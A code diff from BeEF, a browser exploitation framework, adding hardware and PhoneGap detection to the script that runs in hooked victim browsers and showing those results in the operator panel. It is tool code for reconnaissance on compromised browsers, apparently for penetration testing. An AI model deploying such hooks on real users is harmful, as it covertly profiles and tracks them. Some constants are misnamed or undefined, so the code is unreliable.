diff --git a/core/core.rb b/core/core.rb
index dc554314b..6dcff13f2 100644
--- a/core/core.rb
+++ b/core/core.rb
@@ -34,6 +34,7 @@ require 'core/main/constants/browsers'
require 'core/main/constants/commandmodule'
require 'core/main/constants/distributedengine'
require 'core/main/constants/os'
+require 'core/main/constants/hardware'
# @note Include core modules for beef
require 'core/main/configuration'
diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index f955fb6f6..7dbcfdfc6 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -47,6 +47,16 @@ module Filters
true
end
+ # Check the Hardware name value - for example, 'iPhone'
+ # @param [String] str String for testing
+ # @return [Boolean] If the string has valid Hardware name characters
+ def self.is_valid_hwname?(str)
+ return false if not is_non_empty_string?(str)
+ return false if has_non_printable_char?(str)
+ return false if str.length < 2
+ true
+ end
+
# Verify the browser version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 762072108..2e82f5de6 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -551,6 +551,19 @@ beef.browser = {
},
+ /**
+ * Checks if the Phonegap API is available from the hooked domain.
+ * @return: {Boolean} true or false.
+ *
+ * @example: if(beef.browser.hasJava()) { ... }
+ */
+ hasPhonegap: function() {
+ var result = false;
+ try { if (!!device.phonegap) result = true; else result = false; }
+ catch(e) { result = false; }
+ return result;
+ },
+
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -765,6 +778,7 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
+ var hw_name = beef.hardware.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_size = beef.browser.getScreenSize();
@@ -772,6 +786,7 @@ beef.browser = {
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
+ var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -789,6 +804,7 @@ beef.browser = {
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
+ if(hw_name) details['Hardware'] = hw_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
@@ -797,6 +813,7 @@ beef.browser = {
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
+ if(has_phonegap) details['HasPhonegap'] = has_phonegap
if(has_web_socket) details['HasWebSocket'] = has_web_socket
if(has_googlegears) details['HasGoogleGears'] = has_googlegears
if(has_activex) details['HasActiveX'] = has_activex;
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
new file mode 100644
index 000000000..3376aceea
--- /dev/null
+++ b/core/main/client/hardware.js
@@ -0,0 +1,91 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.hardware = {
+
+ ua: navigator.userAgent,
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
+ isIphone: function() {
+ return (this.ua.indexOf('iPhone') != -1) ? true : false;
+ },
+
+ isIpad: function() {
+ return (this.ua.indexOf('iPad') != -1) ? true : false;
+ },
+
+ isIpod: function() {
+ return (this.ua.indexOf('iPod') != -1) ? true : false;
+ },
+
+ isNokia: function() {
+ return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+ },
+
+ isBlackBerry: function() {
+ return (this.ua.match('BlackBerry')) ? true : false;
+ },
+
+ isZune: function() {
+ return (this.ua.match('ZuneWP7')) ? true : false;
+ },
+
+ isKindle: function() {
+ return (this.ua.match('Kindle')) ? true : false;
+ },
+
+ isHtc: function() {
+ return (this.ua.match('HTC')) ? true : false;
+ },
+
+ isEricsson: function() {
+ return (this.ua.match('Ericsson')) ? true : false;
+ },
+
+ isNokia: function() {
+ return (this.ua.match('Nokia')) ? true : false;
+ },
+
+ isMotorola: function() {
+ return (this.ua.match('Motorola')) ? true : false;
+ },
+
+ isGoogle: function() {
+ return (this.ua.match('Nexus One')) ? true : false;
+ },
+
+ getName: function() {
+
+ if (this.isNokia()) return 'Nokia';
+ if (this.isWinPhone()) return 'Windows Phone';
+ if (this.isBlackBerry()) return 'BlackBerry';
+ if (this.isIphone()) return 'iPhone';
+ if (this.isIpad()) return 'iPad';
+ if (this.isIpod()) return 'iPod';
+ if (this.isKindle()) return 'Kindle';
+ if (this.isHtc()) return 'HTC';
+ if (this.isMotorola()) return 'Motorola';
+ if (this.isZune()) return 'Zune';
+ if (this.isGoogle()) return 'Google';
+ if (this.isEricsson()) return 'Ericsson';
+
+ return 'Unknown';
+ }
+};
+
+beef.regCmp('beef.net.hardware');
diff --git a/core/main/client/os.js b/core/main/client/os.js
index c133edcc9..9ccea8a9c 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -72,7 +72,11 @@ beef.os = {
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
-
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
@@ -97,6 +101,10 @@ beef.os = {
return (this.ua.match('BlackBerry')) ? true : false;
},
+ isWebOS: function() {
+ return (this.ua.match('webOS')) ? true : false;
+ },
+
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
@@ -139,11 +147,14 @@ beef.os = {
if(this.isSunOS()) return 'Sun OS';
//iPhone
- if (this.isIphone()) return 'iPhone';
+ if (this.isIphone()) return 'iOS';
//iPad
- if (this.isIpad()) return 'iPad';
+ if (this.isIpad()) return 'iOS';
//iPod
- if (this.isIpod()) return 'iPod';
+ if (this.isIpod()) return 'iOS';
+
+ // zune
+ //if (this.isZune()) return 'Zune';
//macintosh
if(this.isMacintosh()) {
@@ -156,6 +167,7 @@ beef.os = {
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
+ if(this.isWebOS()) return 'webOS';
return 'unknown';
}
diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
new file mode 100644
index 000000000..12386ef78
--- /dev/null
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,89 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+module BeEF
+module Core
+module Constants
+
+ # @note The hardware's strings for hardware detection.
+ module Hardware
+
+ HW_UNKNOWN_IMG = 'pc.png'
+ HW_IPHONE_UA_STR = 'iPhone'
+ HW_IPHONE_IMG = 'iphone.jpg'
+ HW_IPAD_UA_STR = 'iPad'
+ HW_IPAD_IMG = 'ipad.png'
+ HW_IPOD_UA_STR = 'iPod'
+ HW_IPOD_IMG = 'ipod.jpg'
+ HW_BLACKBERRY_UA_STR = 'BlackBerry'
+ HW_BLACKBERRY_IMG = 'blackberry.png'
+ HW_WINPHONE_UA_STR = 'Windows Phone'
+ HW_WINPHONE_IMG = 'win.png'
+ HW_ZUNE_UA_STR = 'ZuneWP7'
+ HW_ZUNE_IMG = 'zune.gif'
+ HW_KINDLE_UA_STR = 'Kindle'
+ HW_KINDLE_IMG = 'kindle.png'
+ HW_NOKIA_UA_STR = 'Nokia'
+ HW_NOKIA_IMG = 'nokia.ico'
+ HW_HTC_UA_STR = 'HTC'
+ HW_HTC_IMG = 'htc.ico'
+ HW_MOTOROLA_UA_STR = 'motorola'
+ HW_MOTOROLA_IMG = 'motorola.png'
+ HW_GOOGLE_UA_STR = 'Nexus One'
+ HE_GOOGLE_IM = 'nexus.png'
+ HW_ERICSSON_UA_STR = 'Ericsson'
+ HW_ERICSSON_IMG = 'sony_ericsson.png'
+ HW_ALL_UA_STR = 'All'
+
+ # Attempt to match operating system string to constant
+ # @param [String] name Name of operating system
+ # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
+ def self.match_hardware(name)
+ case name.downcase
+ when /iphone/
+ HW_IPHONE_UA_STR
+ when /ipad/
+ HW_IPAD_UA_STR
+ when /ipod/
+ HW_IPOD_UA_STR
+ when /blackberry/
+ HW_BLACKBERRY_UA_STR
+ when /windows phone/
+ HW_WINPHONE_UA_STR
+ when /zune/
+ HW_ZUNE_UA_STR
+ when /kindle/
+ HW_KINDLE_UA_STR
+ when /nokia/
+ HW_NOKIA_UA_STR
+ when /motorola/
+ HW_MOTOROLA_UA_STR
+ when /htc/
+ HW_HTC_UA_STR
+ when /google/
+ HW_GOOGLE_UA_STR
+ when /ericsson/
+ HW_ERICSSON_UA_STR
+ else
+ 'ALL'
+ end
+ end
+
+ end
+
+end
+end
+end
diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb
index 2e86f1e39..7f94ba0c4 100644
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -15,75 +15,74 @@
#
module BeEF
-module Core
-module Constants
-
- # @note The OS'es strings for os detection.
- module Os
-
- OS_UNKNOWN_IMG = 'unknown.png'
- OS_WINDOWS_UA_STR = 'Windows'
- OS_WINDOWS_IMG = 'win.png'
- OS_LINUX_UA_STR = 'Linux'
- OS_LINUX_IMG = 'linux.png'
- OS_MAC_UA_STR = 'Mac'
- OS_MAC_IMG = 'mac.png'
- OS_QNX_UA_STR = 'QNX'
- OS_QNX_IMG = 'qnx.ico'
- OS_BEOS_UA_STR = 'BeOS'
- OS_BEOS_IMG = 'beos.png'
- OS_OPENBSD_UA_STR = 'OpenBSD'
- OS_OPENBSD_IMG = 'openbsd.ico'
- OS_IPHONE_UA_STR = 'iPhone'
- OS_IPHONE_IMG = 'iphone.png'
- OS_IPAD_UA_STR = 'iPad'
- OS_IPAD_IMG = 'ipad.png'
- OS_IPOD_UA_STR = 'iPod'
- OS_IPOD_IMG = 'ipod.jpg'
- OS_MAEMO_UA_STR = 'Maemo'
- OS_MAEMO_IMG = 'maemo.ico'
- OS_BLACKBERRY_UA_STR = 'BlackBerry'
- OS_BLACKBERRY_IMG = 'blackberry.png'
- OS_ANDROID_UA_STR = 'Android'
- OS_ANDROID_IMG = 'android.png'
- OS_ALL_UA_STR = 'All'
+ module Core
+ module Constants
+
+ # @note The OS'es strings for os detection.
+ module Os
+
+ OS_UNKNOWN_IMG = 'unknown.png'
+ OS_WINDOWS_UA_STR = 'Windows'
+ OS_WINDOWS_IMG = 'win.png'
+ OS_LINUX_UA_STR = 'Linux'
+ OS_LINUX_IMG = 'linux.png'
+ OS_MAC_UA_STR = 'Mac'
+ OS_MAC_IMG = 'mac.png'
+ OS_QNX_UA_STR = 'QNX'
+ OS_QNX_IMG = 'qnx.ico'
+ OS_BEOS_UA_STR = 'BeOS'
+ OS_BEOS_IMG = 'beos.png'
+ OS_OPENBSD_UA_STR = 'OpenBSD'
+ OS_OPENBSD_IMG = 'openbsd.ico'
+ OS_IOS_UA_STR = 'iOS'
+ OS_IOS_IMG = 'ios.png'
+ OS_IPHONE_UA_STR = 'iPhone'
+ OS_WEBOS_UA_STR = 'webos.png'
+ OS_IPHONE_IMG = 'iphone.jpg'
+ OS_IPAD_UA_STR = 'iPad'
+ OS_IPAD_IMG = 'ipad.png'
+ OS_IPOD_UA_STR = 'iPod'
+ OS_IPOD_IMG = 'ipod.jpg'
+ OS_MAEMO_UA_STR = 'Maemo'
+ OS_MAEMO_IMG = 'maemo.ico'
+ OS_BLACKBERRY_UA_STR = 'BlackBerry'
+ OS_BLACKBERRY_IMG = 'blackberry.png'
+ OS_ANDROID_UA_STR = 'Android'
+ OS_ANDROID_IMG = 'android.png'
+ OS_ALL_UA_STR = 'All'
# Attempt to match operating system string to constant
# @param [String] name Name of operating system
# @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
- def self.match_os(name)
- case name.downcase
- when /win/
- OS_WINDOWS_UA_STR
- when /lin/
- OS_LINUX_UA_STR
- when /os x/, /osx/, /mac/
- OS_MAC_UA_STR
- when /qnx/
- OS_QNX_UA_STR
- when /beos/
- OS_BEOS_UA_STR
- when /openbsd/
- OS_OPENBSD_UA_STR
- when /iphone/
- OS_IPHONE_UA_STR
- when /ipad/
- OS_IPAD_UA_STR
- when /ipod/
- OS_IPOD_UA_STR
- when /maemo/
- OS_MAEMO_UA_STR
- when /blackberry/
- OS_BLACKBERRY_UA_STR
- when /android/
- OS_ANDROID_UA_STR
- else
- 'ALL'
- end
- end
-
+ def self.match_os(name)
+ case name.downcase
+ when /win/
+ OS_WINDOWS_UA_STR
+ when /lin/
+ OS_LINUX_UA_STR
+ when /os x/, /osx/, /mac/
+ OS_MAC_UA_STR
+ when /qnx/
+ OS_QNX_UA_STR
+ when /beos/
+ OS_BEOS_UA_STR
+ when /openbsd/
+ OS_OPENBSD_UA_STR
+ when /ios/, /iphone/, /ipad/, /ipod/
+ OS_IOS_UA_STR
+ when /maemo/
+ OS_MAEMO_UA_STR
+ when /blackberry/
+ OS_BLACKBERRY_UA_STR
+ when /android/
+ OS_ANDROID_UA_STR
+ else
+ 'ALL'
+ end
+ end
+
+ end
+
+ end
end
-
-end
-end
end
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index dfb3b8040..9a5f27946 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
+ # get and store the hardware name
+ hw_name = get_param(@data['results'], 'Hardware')
+ if BeEF::Filters.is_valid_hwname?(hw_name)
+ BD.set(session_id, 'Hardware', hw_name)
+ else
+ self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+ end
+
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +230,14 @@ module BeEF
self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
end
+ # get and store the yes|no value for HasPhonegap
+ has_phonegap = get_param(@data['results'], 'HasPhonegap')
+ if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+ BD.set(session_id, 'HasPhonegap', has_phonegap)
+ else
+ self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+ end
+
# get and store the yes|no value for HasGoogleGears
has_googlegears = get_param(@data['results'], 'HasGoogleGears')
if BeEF::Filters.is_valid_yes_no?(has_googlegears)
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 92473876d..b7ca90bae 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -32,9 +32,9 @@ module Modules
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
- js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
+ js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
else
- js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+ js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
end
# @note construct the beefjs string from file(s)
diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 0cd114c75..3ac2cd2af 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -62,7 +62,7 @@ module Models
browserdetails
end
-
+
#
# Returns the icon representing the browser type the
# hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +94,10 @@ module Models
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
- return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
- return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
- return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+ return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +106,33 @@ module Models
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
+ #
+ # Returns the icon representing the hardware the
+ # zombie is running on (i.e. iPhone, BlackBerry)
+ #
+ def self.hw_icon(session_id)
+
+ ua_string = get(session_id, 'BrowserReportedName')
+
+ return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+ return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
+
+ BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+ end
+
end
end
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index b30573a0d..6fce2a02c 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
- if not host_name.nil?
+ if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
@@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
+
+ # set and add the return values for the hardware name
+ hw_name = BD.get(zombie_session, 'Hardware')
+ if not hw_name.nil?
+ encoded_hw_name = CGI.escapeHTML(hw_name)
+ encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+ page_name_row = {
+ 'category' => 'Host',
+ 'data' => encoded_hw_name_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
@@ -331,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the yes|no value for hasPhonegap
+ has_phonegap = BD.get(zombie_session, 'hasPhonegap')
+ if not has_phonegap.nil?
+ encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+ encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+ page_name_row = {
+ 'category' => 'Browser',
+ 'data' => encoded_has_phonegap_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index f50adb121..a1a35998b 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -14,94 +14,115 @@
# limitations under the License.
#
module BeEF
-module Extension
-module AdminUI
-module Controllers
+ module Extension
+ module AdminUI
+ module Controllers
#
#
#
-class Panel < BeEF::Extension::AdminUI::HttpController
-
- def initialize
- super({
- 'paths' => {
- '/' => method(:index),
- '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update)
- }
- })
- end
-
- # default index page
- def index; end
-
- # return a JSON object contains all the updates for the hooked browser trees
- def hooked_browser_tree_update
- # retrieve the hbs that are online
- hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)))
-
- # retrieve the hbs that are offline
- hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)))
-
- # retrieve the distributed engine rules that are enabled
- distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true))
-
- # hash that gets populated with all the information for the hb trees
- ret = {
- 'success' => true,
-
- # the list of hb
- 'hooked-browsers' => {
- 'online' => hooked_browsers_online,
- 'offline' => hooked_browsers_offline
- },
-
- # the rules for the distributed engine
- 'ditributed-engine-rules' => distributed_engine_rules
- }
-
- @body = ret.to_json
- end
-
- # Takes a list distributed engine rules and format the results into JSON
- def distributed_engine_rules_2_json_simple(rules)
+ class Panel < BeEF::Extension::AdminUI::HttpController
- end
-
- # Takes a list of zombies and format the results in a JSON array.
- def zombies2json_simple(zombies)
- zombies_hash = {}
- i = 0
-
- zombies.each do |zombie|
- # create hash of zombie details
- zombies_hash[i] = (get_simple_hooked_browser_hash(zombie))
- i+=1
+ def initialize
+ super({
+ 'paths' => {
+ '/' => method(:index),
+ '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update)
+ }
+ })
+ end
+
+ # default index page
+ def index;
+ end
+
+ # return a JSON object contains all the updates for the hooked browser trees
+ def hooked_browser_tree_update
+ # retrieve the hbs that are online
+ hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)))
+
+ # retrieve the hbs that are offline
+ hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)))
+
+ # retrieve the distributed engine rules that are enabled
+ distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true))
+
+ # hash that gets populated with all the information for the hb trees
+ ret = {
+ 'success' => true,
+
+ # the list of hb
+ 'hooked-browsers' => {
+ 'online' => hooked_browsers_online,
+ 'offline' => hooked_browsers_offline
+ },
+
+ # the rules for the distributed engine
+ 'ditributed-engine-rules' => distributed_engine_rules
+ }
+
+ @body = ret.to_json
+ end
+
+ # Takes a list distributed engine rules and format the results into JSON
+ def distributed_engine_rules_2_json_simple(rules)
+
+ end
+
+ # Takes a list of zombies and format the results in a JSON array.
+ def zombies2json_simple(zombies)
+ zombies_hash = {}
+ i = 0
+
+ zombies.each do |zombie|
+ # create hash of zombie details
+ zombies_hash[i] = (get_simple_hooked_browser_hash(zombie))
+ i+=1
+ end
+
+ zombies_hash
+ end
+
+ # create a hash of simple hooked browser details
+ def get_simple_hooked_browser_hash(hooked_browser)
+
+ browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
+ browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
+ browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
+ os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
+ os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
+ hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
+ hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
+ domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
+ has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+ has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
+ has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
+ has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+ date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
+
+ return {
+ 'session' => hooked_browser.session,
+ 'ip' => hooked_browser.ip,
+ 'domain' => domain,
+ 'port' => hooked_browser.port.to_s,
+ 'browser_name' => browser_name,
+ 'browser_version' => browser_version,
+ 'browser_icon' => browser_icon,
+ 'os_icon' => os_icon,
+ 'os_name' => os_name,
+ 'hw_icon' => hw_icon,
+ 'hw_name' => hw_name,
+ 'has_flash' => has_flash,
+ 'has_web_sockets' => has_web_sockets,
+ 'has_googlegears' => has_googlegears,
+ 'has_java' => has_java,
+ 'date_stamp' => date_stamp
+ }
+
+ end
+ end
+
+ end
end
-
- zombies_hash
- end
-
- # create a hash of simple hooked browser details
- def get_simple_hooked_browser_hash(hooked_browser)
-
- browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
- os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
- domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
-
- return {
- 'session' => hooked_browser.session,
- 'ip' => hooked_browser.ip,
- 'domain' => domain,
- 'port' => hooked_browser.port.to_s,
- 'browser_icon' => browser_icon,
- 'os_icon' => os_icon
- }
-
end
end
-
-end
-end
-end
-end
diff --git a/extensions/admin_ui/media/images/icons/htc.ico b/extensions/admin_ui/media/images/icons/htc.ico
new file mode 100644
index 000000000..a4b722423
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/htc.ico differ
diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png
new file mode 100644
index 000000000..a3477139c
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/ios.png differ
